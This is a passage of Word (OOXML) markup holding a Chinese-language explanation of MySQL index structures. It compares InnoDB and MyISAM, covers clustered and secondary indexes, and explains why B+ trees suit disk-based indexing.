        <w:t>作为索引结构，但具体实现方式却与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>截然不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一个重大区别是：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的数据文件本身就是索引文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第二个与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引的不同是：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的辅助索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域存储相应记录主键的值而不是地址。聚集索引这种实现方式使得按主键的搜索十分高效，但是辅助索引搜索需要检索两遍索引：首先检索辅助索引获得主键，然后用主键到主索引中检索获得记录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其实，数据库索引的实现可以采用红黑树，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B-Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树数据结构。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>但是为什么实际上采用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这要从计算机存储原理和操作系统相关知识说起。因为数据表的索引比较大，不能常驻内存，所以以文件形式存储在磁盘中。所以当查询数据的时候就需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作。高效率查询的目标是较少</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>次数。一次</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一般读取一页（一般为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4k</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）大小的数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>局部性原理</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。如此，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树中，每当申请一个新结点时，就以页的大小来申请。也就是说一次</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I/o</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以读取一个一个结点（包含很多</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）的数据；而在红黑树结构结构中，逻辑相邻的结点物理上不一定相邻，就是说，读取同等的数据需要多次</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。所以选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树效率更好。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那为何最终选了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树内节点去掉了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域，因此可以拥有更大的出度，就是说一个结点可以存储更多的内结点，那么</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>效率更高。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>了解不同存储引擎的索引实现方式对于正确使用和优化索引都非常有帮助，例如知道了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的索引实现后，就很容易明白为什么不建议使用过长的字段作为主键，因为所有辅助索引都引用主索引，过长的主索引会令辅助索引变得过大。再例如，用非单调的字段作为主键在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中不是个好主意，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据文件本身是一颗</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，非单调的主键会造成在插入新记录时数据文件为了维持</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的特性而频繁的分裂调整，十分低效，而使用自增字段作为主键则是一个很好的选择。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>聚集索引与非聚集索引之分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064429E" w:rsidRPr="00F41A4C" w:rsidRDefault="0064429E" w:rsidP="0064429E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是聚集索引，因为它的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树的叶结点包含了完整的数据记录。而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
